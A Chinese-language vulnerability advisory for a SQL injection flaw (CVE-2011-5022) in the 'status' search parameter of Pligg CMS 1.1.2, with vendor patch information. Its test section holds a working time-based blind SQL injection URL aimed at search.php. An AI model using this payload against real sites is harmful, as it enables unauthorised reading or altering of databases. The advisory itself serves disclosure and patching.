Pligg CMS 'status'参数SQL注入漏洞
Pligg CMS 'status'参数SQL注入漏洞
发布日期:2012-10-10
更新日期:2012-10-11
受影响系统:
Pligg Pligg CMS 1.1.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51273
CVE(CAN) ID: CVE-2011-5022
Pligg是可以免费下载使用的开源内容管理系统。
Pligg CMS 1.1.2及其他版本存在SQL注入漏洞,可允许远程攻击者控制应用、访问或修改数据等。
<*来源:Sitewatch
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&amp;status='and+sleep(9)or+sleep(9)or
+1%3D' &amp;search=on&amp;advancesearch= Search
+&amp;sgroup=on&amp;stags=0&amp;slink=on&amp;scategory=on&amp;scomments=0&amp;SUSEr=0
建议:
--------------------------------------------------------------------------------
厂商补丁:
Pligg
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.pligg.com/
评论暂时关闭